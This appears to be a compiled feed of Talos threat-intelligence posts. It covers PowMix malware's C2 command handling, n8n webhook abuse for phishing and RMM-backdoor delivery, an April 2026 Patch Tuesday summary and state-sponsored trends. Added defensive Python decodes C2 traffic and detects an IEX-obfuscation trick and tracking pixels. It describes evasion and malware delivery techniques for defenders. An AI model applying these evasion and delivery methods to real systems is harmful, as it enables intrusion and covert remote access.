For responses from the C2 that are not prefixed with #, PowMix’s command processing routine switches to an arbitrary execution mode. It evades static detection of the Invoke-Expression (IEX) PowerShell cmdlet by dynamically reconstructing the command string from the $VerbosePreference variable, then executes the decrypted payload while redirecting the output to Out-Null so that no execution output is left behind.
Figure 16. PowMix excerpts with the instructions facilitating the C2 commands.
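To make the command dispatch above concrete for an analyst working from a packet capture, here is an added example (written for this newsletter, not Talos's or the malware's code) that decodes a captured C2 response the way the report describes, splitting on the period, XOR-decrypting the second segment with the Bot ID, and classifying the result as #KILL, #HOST, or arbitrary execution, and that applies a constructed heuristic to the arbitrary-execution case to spot the $VerbosePreference-based IEX reconstruction. It assumes the encrypted segment is hex-encoded, the XOR routine is plain repeating-key XOR, and the #HOST argument follows the keyword after whitespace; none of those details are stated in the report.

```python
"""Added example (not Talos's code): decode a captured PowMix C2 response and
classify the command the bot would act on, plus a heuristic scan of an
arbitrary-execution payload for the $VerbosePreference trick the report describes.

Assumptions not stated on the page: the encrypted second segment is hex-encoded,
the XOR routine is plain repeating-key XOR over the Bot ID's UTF-8 bytes, and
the #HOST argument follows the keyword after whitespace.
"""
import re
from dataclasses import dataclass


def xor_with_key(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; symmetric, so the same call encrypts and decrypts."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


@dataclass
class C2Command:
    kind: str      # "KILL", "HOST", "EXEC" (arbitrary PowerShell) or "UNKNOWN"
    argument: str  # new C2 host for HOST, script text for EXEC, empty for KILL


def decode_c2_response(body: str, bot_id: str) -> C2Command:
    """Split on '.', decrypt the second segment with the Bot ID, classify it."""
    segments = body.split(".")
    if len(segments) < 2:
        raise ValueError("expected a period-delimited response with at least two segments")
    plaintext = xor_with_key(bytes.fromhex(segments[1]), bot_id.encode()).decode("utf-8", "replace")
    if not plaintext.startswith("#"):
        return C2Command("EXEC", plaintext)  # non-# responses go straight to execution
    keyword, _, argument = plaintext[1:].partition(" ")
    if keyword.upper() in ("KILL", "HOST"):
        return C2Command(keyword.upper(), argument.strip())
    return C2Command("UNKNOWN", plaintext)


# Legitimate scripts assign or compare $VerbosePreference; picking characters out of
# its value by index is how a script keeps the literal cmdlet name out of its text.
VERBOSE_INDEXING = re.compile(r"\$VerbosePreference\s*(?:\.ToString\(\))?\s*\[", re.IGNORECASE)


def looks_like_iex_reconstruction(script: str) -> bool:
    """Heuristic (constructed for this example): flag indexing into $VerbosePreference."""
    return bool(VERBOSE_INDEXING.search(script))


def describe(body: str, bot_id: str) -> str:
    """One-line analyst summary of a captured response."""
    cmd = decode_c2_response(body, bot_id)
    if cmd.kind == "EXEC":
        flag = " [IEX reconstruction via $VerbosePreference]" if looks_like_iex_reconstruction(cmd.argument) else ""
        return f"arbitrary execution, {len(cmd.argument)} chars{flag}"
    return f"{cmd.kind} {cmd.argument}".strip()


if __name__ == "__main__":
    bot = "a1b2"  # constructed Bot ID
    # Constructed responses: the first segment is filler, the second is the hex ciphertext.
    for plain in (b"#KILL", b"#HOST c2-new.example.invalid", b"$VerbosePreference.ToString()[1,3]"):
        print(describe("ack." + xor_with_key(plain, bot.encode()).hex(), bot))
```

Note that the decoder never evaluates the EXEC payload; it only surfaces it, which is the right boundary for tooling that sits in an analysis pipeline.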
Coverage
The following ClamAV signatures detect and block this threat:
Lnk.Trojan.PowMix-10059735-0
Txt.Trojan.PowMix-10059742-0
Txt.Trojan.PowMix-10059778-0
Win.Trojan.PowMix-10059728-0
The following Snort Rules (SIDs) detect and block this threat:
Snort2 and Snort3: 66118
Indicators of compromise (IOCs)
The IOCs for this threat are also available at our GitHub repository here.
In this episode of Humans of Talos, Amy sits down with Wendy Bishop, Head of Creative, to explore the vital role of design in the world of cybersecurity. From her early beginnings in web design and journalism to leading the creative vision for Talos, Wendy shares the unique challenges and rewards of bridging the gap between artistic expression and highly technical research.
Whether you're a creative professional looking to break into the cybersecurity industry or simply curious about the people behind our security intelligence, this conversation offers a fascinating look at the artistic side of Talos' mission to keep the digital world safe.
Amy Ciminnisi: Wendy, welcome! We haven’t had anyone from creative here yet. Can you talk to me a little bit about what drew you into creative work and how your career evolved into what it is now at Talos?
Wendy Bishop: I never in my entire life thought I would do anything besides something creative. It’s the only thing I’ve ever known. I have so many memories in my childhood of just being locked in my moody teenage bedroom. In high school, I started doing web design courses, and I think that’s when I really started being interested in a graphic design path. I learned Photoshop and basic HTML/CSS stuff as a side hobby. I moderated a message board for my favorite pop-punk band in high school. When it came time to go to college, there was nothing I wanted to do otherwise besides design. I found myself at Ohio University — that’s where I’m from, Ohio — in the School of Visual Communication.
I went off to a job working in newspapers. I actually never thought I would, but it was the job I found after college, and I designed news pages. It sounds funny now; it was already dying then, probably not the best long career path. But I think my background in journalism and communication-driven design is really what made me a great fit for the kind of design work we do here at Talos. We work with complicated materials, and a lot of the creative work we do is comms-driven. Our blog in some ways functions as a news outlet, so visual storytelling is a lot of my job. But of course, we have a lot of regular, branding-based design work now that comes out of my team.
AC: We just had a really big report come out that has occupied our minds for months, especially over here in design. Can you talk a little bit about the 2025 Year in Review and share what that process is like?
WB: When it starts to take shape, I look over that draft with the team and we talk about each graphic. I say, "That one might be better if we did this," or "This is missing that piece for when it goes into production." I really start to wrap my mind around the various assets and how we would go about taking what is essentially an Excel graphic or something created in PowerPoint and making it into a much more polished and designed presentation.
We get a sneak peek, and then one day it lands on your desk, Amy. From there, my designers and I put it together. It’s a lot about putting that puzzle together, thinking about what makes sense on each page, making sure the content flow is clean and linear, and the adjacencies of the graphics are in the right place. I come to you and say, "Amy, I need a headline," or "Does this make sense?" We come up with a look and feel and theme for the whole report every year that’s greater than just the layout of the document. That gets extended to all the other companion pieces — our videos, social graphics, and any continuing campaign pieces.
Want to see more? Watch the full interview, and don’t forget to subscribe to our YouTube channel for future episodes of Humans of Talos.
Cisco Talos research has uncovered agentic AI workflow automation platform abuse in emails. Recently, we identified an increase in the number of emails that abuse n8n, one of these platforms, from as early as October 2025 through March 2026.
In this blog, Talos provides concrete examples of how threat actors are weaponizing legitimate automation platforms to facilitate sophisticated phishing campaigns, ranging from delivering malware to fingerprinting devices.
By leveraging trusted infrastructure, these attackers bypass traditional security filters, turning productivity tools into delivery vehicles for persistent remote access.
AI workflow automation platforms such as Zapier and n8n are primarily used to connect different software applications (e.g., Slack, Google Sheets, or Gmail) with AI models (e.g., OpenAI’s GPT-4 or Anthropic’s Claude). These platforms have been applied to different application domains, including cybersecurity over the past few months, especially with the progress that has been made in new avenues like large language models (LLMs) and agentic AI systems. However, much like other legitimate tools, AI workflow automation platforms can be weaponized to orchestrate malicious activities, like delivering malware by sending automated emails.
This blog describes how n8n, one of the most popular AI workflow automation platforms, has been abused to deliver malware and fingerprint devices by sending automated emails.
What is n8n?
n8n is a workflow automation platform that connects web applications and services (including Slack, GitHub, Google Sheets, and others with HTTP-based APIs) and builds automated workflows. A community-licensed version of the platform can be self-hosted by organizations. The commercial service, hosted at n8n.io, includes AI-driven features that can create agents capable of using web-based APIs to pull data from documents and other data sources.
Users can register for an n8n developer account at no initial charge. Doing so creates a subdomain under “tti.app.n8n[.]cloud” from which the user’s applications can be accessed. This is similar to many web-based AI-aided development tools, and a pattern that malicious actors have harnessed elsewhere in the past; earlier this year, Talos observed another AI-oriented web application service, Softr.io, being used to create phishing pages in a series of targeted attacks.
How n8n’s webhooks work
Talos' investigation found that a primary point of abuse in n8n’s AI workflow automation platform is its URL-exposed webhooks. A webhook, often referred to as a “reverse API,” allows one application to provide real-time information to another. These URLs register an application as a “listener” to receive data, which can include programmatically pulled HTML content. An example of an n8n webhook URL is shown in Figure 1.
Figure 1. Anatomy of an example n8n webhook URL.
When the URL receives a request, the subsequent workflow steps are triggered, returning results as an HTTP data stream to the requesting application. If the URL is accessed via email, the recipient’s browser acts as the receiving application, processing the output as a webpage.
Talos has observed a significant rise in emails containing n8n webhook URLs over the past year. For example, the volume of these emails in March 2026 was approximately 686% higher than in January 2025. This increase is driven, in part, by several instances of platform abuse, including malware delivery and device fingerprinting, as we will discuss in the next sections.
Figure 2. The prevalence of n8n webhook URLs in emails over the past few months.
Abusing n8n for malware delivery
Because webhooks mask the source of the data they deliver, they can be used to serve payloads from untrusted sources while making them appear to originate from a trusted domain. Furthermore, since webhooks can dynamically serve different data streams based on triggering events — such as request header information — a phishing operator can tailor payloads based on the user-agent header.
Figure 3. Example of a malicious email that delivers malware to the victim’s device by abusing the n8n platform.
Talos observed a phishing campaign (shown in Figure 3) that used an n8n-hosted webhook link in emails that purported to be a shared Microsoft OneDrive folder. When clicked, the link opened a webpage in the targeted user’s browser containing a CAPTCHA.
Figure 4. HTML document delivered by the webhook presenting a CAPTCHA.
Once the CAPTCHA is completed, a download button appears, triggering a progress bar as the payload is downloaded from an external host. Because the entire process is encapsulated within the JavaScript of the HTML document, the download appears to the browser to have come from the n8n domain.
Figure 5. HTML and JavaScript payload of the webhook downloads an executable file from a malicious URL.
In this case, the payload was an .exe file named “DownloadedOneDriveDocument.exe” that posed as a self-extracting archive. When opened, it installed a modified version of the Datto Remote Monitoring and Management (RMM) tool and executed a chain of PowerShell commands.
Figure 6. Downloaded executable and the document it deploys (an installer for an RMM tool).
The PowerShell commands generated by the malicious executable extract and configure the Datto RMM tool, configure it as a scheduled task, and then launch it, establishing a connection to a relay on Datto's "centrastage[.]net" domain before deleting themselves and the rest of the payload.
Figure 7. The webhook-delivered “DownloadedOneDriveDocument.exe” malware attack chain.
Talos observed a similar campaign that also utilized an n8n webhook to deliver a different payload. Like the previous instance, it featured a self-contained phishing page delivered as a data stream from the webhook, protected with a CAPTCHA for human verification.
Figure 8. Second CAPTCHA variant presented by n8n webhook.
This CAPTCHA code was significantly simpler than the first case. The payload delivered upon solving the CAPTCHA was a maliciously modified Microsoft Windows Installer (MSI) file named “OneDrive_Document_Reader_pHFNwtka_installer.msi”. Protected by the Armadillo anti-analysis packer, the payload deployed a different backdoor: the ITarian Endpoint Management RMM tool. When executed by “msiexec.exe”, the file installs a modified version of the ITarian Endpoint RMM, which acts as a backdoor while running Python modules to exfiltrate information from the target’s system. During this process, a fake installer GUI displays a progress bar; once finished, the bar resets to 0% and the application exits, creating the illusion of a failed installation.
Abusing n8n for fingerprinting
Talos observed another common abuse case: device fingerprinting. This is achieved by embedding an invisible image (or tracking pixel) within an email. For example, when the <img> HTML tag is used, it tells the email client (e.g., Outlook or Gmail) to fetch an image from a specific URL. Figure 9 shows an example spam email in the Spanish language that leverages this technique.
Figure 9. Email example where n8n is abused to fingerprint the recipient’s device.
When the email client attempts to load the image, it automatically sends an HTTP GET request to the specified address, which is an n8n webhook URL. These URLs include tracking parameters (such as the victim’s email address), allowing the server to identify exactly which user opened the email. The source also shows how the image is made invisible using the “display” and “opacity” CSS properties.
Figure 10. HTML source snippet of the email in Figure 9.
The second example below uses the same technique to track email opens and fingerprint the recipient’s device. Here, the sender tries to get hold of the recipient by introducing a new gift card feature.
Figure 11. Email example where n8n is abused to fingerprint the recipient’s device.
Figure 12. HTML source snippet of email in Figure 11.
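Both abuse cases in this post, the webhook link dressed up as a OneDrive share and the hidden tracking pixel with per-recipient query parameters, can be caught by the same pass over an email’s HTML. The following is an added example for this newsletter, not Talos's or n8n’s code: it walks the HTML with the standard-library parser, flags any n8n.cloud webhook URL in an <a> or <img>, decides whether an image is hidden (display/opacity/visibility CSS or a 1x1 size), and pulls out the query-string identifiers. It assumes n8n’s documented “/webhook/” and “/webhook-test/” path prefixes; the sample email and its hostnames are constructed.

```python
"""Added example (not Talos's code): scan an email's HTML for n8n webhook URLs
and classify each one as a hidden tracking pixel, a visible image, or a link,
extracting any tracking parameters from the query string.

Assumptions: hosts under n8n.cloud with a path starting /webhook/ or
/webhook-test/ (n8n's production and test webhook prefixes) are treated as
webhooks; the sample HTML and hostnames are constructed for this example.
"""
import re
from html.parser import HTMLParser
from urllib.parse import parse_qsl, urlsplit

N8N_HOST = re.compile(r"(^|\.)n8n\.cloud$", re.IGNORECASE)
WEBHOOK_PREFIXES = ("/webhook/", "/webhook-test/")
# display:none, visibility:hidden, or opacity that is exactly zero (0, 0.0, ...)
HIDDEN_CSS = re.compile(
    r"display\s*:\s*none|opacity\s*:\s*0(?![.\d]*[1-9])|visibility\s*:\s*hidden", re.IGNORECASE)


def is_n8n_webhook(url: str) -> bool:
    parts = urlsplit(url)
    return bool(parts.hostname and N8N_HOST.search(parts.hostname)
                and parts.path.startswith(WEBHOOK_PREFIXES))


def tracking_params(url: str) -> dict:
    """Query-string values are where the per-recipient identifiers ride."""
    return dict(parse_qsl(urlsplit(url).query))


class EmailScanner(HTMLParser):
    def __init__(self) -> None:
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "img" and is_n8n_webhook(a.get("src", "")):
            tiny = a.get("width") in ("0", "1") or a.get("height") in ("0", "1")
            hidden = bool(HIDDEN_CSS.search(a.get("style", ""))) or tiny
            self._add("tracking_pixel" if hidden else "image", a["src"], hidden)
        elif tag == "a" and is_n8n_webhook(a.get("href", "")):
            self._add("link", a["href"], False)

    def _add(self, kind, url, hidden):
        self.findings.append({"kind": kind, "url": url, "hidden": hidden,
                              "params": tracking_params(url)})


def scan_email_html(html: str) -> list:
    scanner = EmailScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample email: a webhook link posing as a share, a hidden pixel, a benign logo.
SAMPLE_EMAIL_HTML = """
<html><body>
<p>A document was shared with you.
   <a href="https://wf-demo.app.n8n.cloud/webhook/share?u=bob">Open OneDrive folder</a></p>
<img src="https://wf-demo.app.n8n.cloud/webhook/open?email=bob%40example.invalid&amp;c=spring"
     width="1" height="1" style="display:none;opacity:0">
<img src="https://cdn.example.invalid/logo.png" alt="logo">
</body></html>
"""

if __name__ == "__main__":
    for f in scan_email_html(SAMPLE_EMAIL_HTML):
        print(f["kind"], f["url"], f["params"])
```

A mail gateway that already parses HTML can apply the same classification; the useful output is not the block decision (n8n.cloud also carries legitimate workflows) but the combination of webhook URL, hidden rendering, and recipient-specific parameters, which is the fingerprinting pattern this post describes.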
Conclusion
The same workflows designed to save developers hours of manual labor are now being repurposed to automate malware delivery and device fingerprinting, thanks to their flexibility, ease of integration, and seamless automation. As we continue to leverage the power of low-code automation, it’s the responsibility of security teams to ensure these platforms and tools remain assets rather than liabilities.
Protection
Because several AI automation platforms exist today that are inherently designed to be flexible and trustworthy, the security community must move beyond simple static analysis to effectively counter their abuse. For instance, instead of blocking entire domains, which would disrupt legitimate business workflows, security researchers should investigate behavioral detection approaches. These should trigger alerts when high volumes of traffic are directed toward such platforms from unexpected internal sources. Similarly, if an endpoint attempts to communicate with an AI automation platform’s domain (e.g., “n8n.cloud”) that is not part of the organization’s authorized workflow, it should trigger an immediate alert.
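The two behavioral checks suggested above are simple to state but worth seeing as a rule, so here is an added example (written for this newsletter, not Talos's code) that runs them over constructed egress log lines: it alerts when a client talks to an automation platform domain that is not on that client’s authorized list, and when one client’s request count to a platform exceeds a threshold in the evaluated window. The platform suffixes are the two named in the post; the allowlist, threshold, and log lines are constructed and would be replaced with an organization’s own.

```python
"""Added example (not Talos's code): behavioural alerting on egress to AI
workflow-automation platforms, implementing the two checks the post suggests:
a client contacting a platform domain outside any authorised workflow, and an
unusually high request count from one client. Platform names are the two the
blog mentions; the allowlist, threshold and log lines are constructed.
"""
from collections import Counter

PLATFORM_SUFFIXES = ("n8n.cloud", "zapier.com")
# Hypothetical allowlist: client IP -> platforms it is sanctioned to use.
AUTHORISED = {"10.1.0.5": {"n8n.cloud"}}
VOLUME_THRESHOLD = 3  # requests per client per platform in the evaluated window


def platform_for(host: str):
    """Return the matching platform suffix, or None for unrelated hosts."""
    h = host.lower().rstrip(".")
    for suffix in PLATFORM_SUFFIXES:
        if h == suffix or h.endswith("." + suffix):
            return suffix
    return None


def evaluate(lines: list, authorised: dict = AUTHORISED, threshold: int = VOLUME_THRESHOLD) -> list:
    """Lines are '<time> <client-ip> <host>'; the whole list is treated as one window."""
    alerts, counts, seen = [], Counter(), set()
    for line in lines:
        _time, client, host = line.split()
        platform = platform_for(host)
        if platform is None:
            continue
        counts[(client, platform)] += 1
        # One alert per (client, host) pair, even if the host is contacted repeatedly.
        if platform not in authorised.get(client, set()) and (client, host) not in seen:
            seen.add((client, host))
            alerts.append(("unauthorised_platform", client, host))
    for (client, platform), n in counts.items():
        if n > threshold:
            alerts.append(("high_volume", client, f"{platform} x{n}"))
    return alerts


# Constructed egress log: 10.1.0.5 is sanctioned for n8n but noisy; 10.1.0.9 is not sanctioned.
SAMPLE_LINES = [
    "10:00:01 10.1.0.5 wf.app.n8n.cloud",
    "10:00:02 10.1.0.5 wf.app.n8n.cloud",
    "10:00:03 10.1.0.5 wf.app.n8n.cloud",
    "10:00:04 10.1.0.5 wf.app.n8n.cloud",
    "10:00:09 10.1.0.9 abc.app.n8n.cloud",
    "10:00:10 10.1.0.9 www.example.invalid",
    "10:00:11 10.1.0.9 hooks.zapier.com",
]

if __name__ == "__main__":
    for alert in evaluate(SAMPLE_LINES):
        print(*alert)
```

The threshold is deliberately a parameter: the right value comes from baselining each sanctioned workflow’s normal request rate, not from a fixed number.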
Collaborative intelligence sharing is another effective approach to countering malicious email campaigns. Security teams should prioritize sharing indicators of compromise (IOCs) — such as specific webhook URL structures, malicious file hashes, and command and control (C2) domains — with platforms like Cisco Talos Intelligence.
Last but not least, safeguarding against these complex threats necessitates a comprehensive email security solution that utilizes AI-driven detection. Secure Email Threat Defense employs distinctive deep learning and machine learning models, incorporating Natural Language Processing, within its sophisticated threat detection systems. It detects harmful techniques employed in attacks against your organization, extracts unmatched context for particular business risks, offers searchable threat data, and classifies threats to identify which sectors of your organization are most at risk of attack. You can register now for a free trial of Email Threat Defense.
IOCs
IOCs for this threat are also available on our GitHub repository here.
Microsoft has released its monthly security update for April 2026, which includes 165 vulnerabilities affecting a wide range of products, including eight that Microsoft marked as “critical.”
CVE-2026-23666 is a critical Denial of Service (DoS) vulnerability that affects the .NET framework. Successful exploitation could allow the attacker to deny service over the network.
CVE-2026-32157 is a critical use after free vulnerability in the Remote Desktop Client that results in code execution. The attack requires an authorized user on the client to connect to a malicious server, which could result in code execution on the client.
CVE-2026-32190 is a critical use after free vulnerability in Microsoft Office that can result in local code execution. The attacker is remote, but the attack is carried out locally. Code from the local machine needs to be executed to exploit the vulnerability.
CVE-2026-33114 is a critical untrusted pointer dereference vulnerability in Microsoft Office Word that could allow the attacker to execute code locally. Code from the local machine needs to be executed to exploit this vulnerability.
CVE-2026-33115 is a critical use after free vulnerability in Microsoft Office Word that can result in local code execution. Similar to CVE-2026-33114 and CVE-2026-32190, the attacker is remote, but code needs to be executed from the local machine to exploit the vulnerability.
CVE-2026-33824 is a critical double free vulnerability in the Windows Internet Key Exchange (IKE) extension, allowing remote code execution. An unauthenticated attacker can send specially crafted packets to a Windows machine with IKE version 2 enabled to potentially enable remote code execution. Additional mitigations can include blocking inbound traffic on UDP ports 500 and 4500 if IKE is not in use.
CVE-2026-33826 is a critical improper input validation vulnerability in Windows Active Directory that can result in code execution over an adjacent network. It requires an authenticated attacker to send specially crafted RPC calls to an RPC host and can result in remote code execution. Note that successful exploitation requires the attacker to be in the same restricted Active Directory domain as the target system.
CVE-2026-33827 is a critical race condition vulnerability in Windows TCP/IP that can result in remote code execution. Successful exploitation requires the attacker to win a race condition along with additional actions prior to exploitation to prepare the target environment. An unauthenticated actor can send specially crafted IPv6 packets to a Windows node where IPSec is enabled to potentially achieve remote code execution.
CVE-2026-32201 is an important improper input validation vulnerability in Microsoft Office SharePoint that can allow an unauthorized user to perform spoofing. An attacker that successfully exploits this vulnerability could view some sensitive information and make changes to disclosed information. This vulnerability has already been detected as being exploited in the wild.
The majority of the remaining vulnerabilities are labeled as important, with two moderate and one low vulnerability also being patched. Talos would like to highlight several additional important vulnerabilities that Microsoft has deemed “more likely” to be exploited.
· CVE-2026-32225 - Windows Shell Security Feature Bypass Vulnerability
· CVE-2026-33825 - Microsoft Defender Elevation of Privilege Vulnerability
A complete list of all other vulnerabilities Microsoft disclosed this month is available on its update page. In response to these vulnerability disclosures, Talos is releasing a new Snort rule set that detects attempts to exploit some of them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Cisco Security Firewall customers should use the latest update to their ruleset by updating their SRU. Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.
The rules included in this release that protect against the exploitation of many of these vulnerabilities are: 1:65902-1:65903, 1:66242-1:66251, 1:66259-1:66260, 1:66264-1:66267, 1:66275-1:66276
The following Snort 3 rules are also available: 1:301398, 1:301468-1:3101472, 1:301475, 1:301477-1:301478, 1:301480
Across the Talos 2025 Year in Review, state-sponsored threat activity from China, Russia, North Korea, and Iran all had varying motivations, such as espionage, disruption, financial gain, and geopolitical influence.
But when you look at how these operations actually unfold, similar tactics, techniques, and procedures (TTPs) keep appearing: access through vulnerabilities and identity, and access that remains under the radar for a considerable period of time.
Here are the dominant themes from the state-sponsored section of the Talos Year in Review, available now.
China
China-nexus threat activity stood out this year for both volume and efficiency, with Talos investigations increasing by nearly 75% compared to 2024.
Newly disclosed vulnerabilities were exploited almost immediately (e.g., ToolShell), sometimes before patches were widely available. At the same time, long-standing, unpatched vulnerabilities in networking devices and widely used software continued to provide reliable entry points for these types of adversaries.
Once inside, the focus shifts to persistence. Web shells, custom backdoors, tunneling tools, and credential harvesting all support long-term access.
There’s also more overlap than ever before between state-sponsored and financially motivated activity. It is likely that in some cases, state-sponsored actors conducted operations for personal profit alongside espionage-focused missions, while in others, cybercriminals collected valuable information during an attack that could be sold to espionage-motivated actors for further exploitation, providing them dual revenue streams.
Russia
Russian-linked cyber activity remains closely tied to Russia’s geopolitical objectives, particularly the war in Ukraine.
Many operations continue to rely on unpatched, older vulnerabilities (especially in networking devices) to gain initial access. These flaws provide a dependable way in for adversaries and support long-term intelligence gathering.
Russia’s offensive cyber activity is highly correlated with developments in the larger geopolitical sphere. For example, the announcement of sanctions intended to apply pressure on Russia by both the U.S. and E.U. often corresponded with our observed levels of Russian cyber activity.
Common malware families like Dark Crystal RAT (DCRAT), Remcos RAT, and Smoke Loader appeared frequently in Talos investigations on operations against Ukraine in 2025. These families aren’t exclusive to Russia-nexus threat actors, but they continue to be effective in environments where patching and visibility are inconsistent, and should therefore be high priority targets for defense and monitoring.
North Korea
North Korean cyber operations leaned heavily into social engineering and insider access in 2025. These operations served both financial and espionage purposes.
Campaigns like Contagious Interview (orchestrated by Famous Chollima) used fake recruiters from legitimate companies to socially engineer targets into executing code or handing over credentials. From there, actors stole cryptocurrency, exfiltrated data, and established persistent access.
North Korean cyber actors also pulled off the largest cryptocurrency heist in history in 2025, stealing $1.5 billion. Additionally, thousands of IT workers used stolen identities and AI-generated profiles to secure positions at Fortune 500 companies, generating billions in annual revenue for North Korea’s nuclear weapons and ballistic missile programs.
Iran
Iranian cyber threat activity in 2025 combined visible disruption with long-term access.
Hacktivist operations increased by 60% in response to geopolitical events, particularly the Israel-Hamas conflict. These campaigns, which include distributed denial-of-service (DDoS) attacks, defacements, and other disruptive operations, are often designed to generate attention and shape narratives.
At the same time, more traditional advanced persistent threat (APT) activity focused on persistence. Groups such as ShroudedSnooper targeted sectors like telecommunications, using custom compact backdoors designed to blend into normal traffic and remain undetected.
ShroudedSnooper is an APT that public reporting widely attributes to Iran’s Ministry of Intelligence and Security (MOIS). It is very likely an initial access group that passes operations off to secondary threat actors for long term espionage or destructive attacks.
For current threat intelligence related to the developing conflict in Iran, follow our coverage on the Talos blog.
Guidance for defenders
Though the state-sponsored actors that we tracked for the Talos Year in Review have different objectives, they all rely on gaining and maintaining access. The following guidance is recommended for security teams:
Don’t ignore older systems: Both newly disclosed and long-known vulnerabilities are actively exploited.
Prioritize identity security: Credentialed access and social engineering remain reliable entry points.
Increase visibility into network and edge infrastructure: These systems are common targets for persistent access.
Expect activity to follow global events: Sanctions, conflicts, and political developments often correlate with spikes in activity. Follow the Talos blog to keep informed of new state-sponsored activity and campaigns.
Inspect for long-term presence: Many state-sponsored operations are designed to persist stealthily over time, not trigger immediate disruption.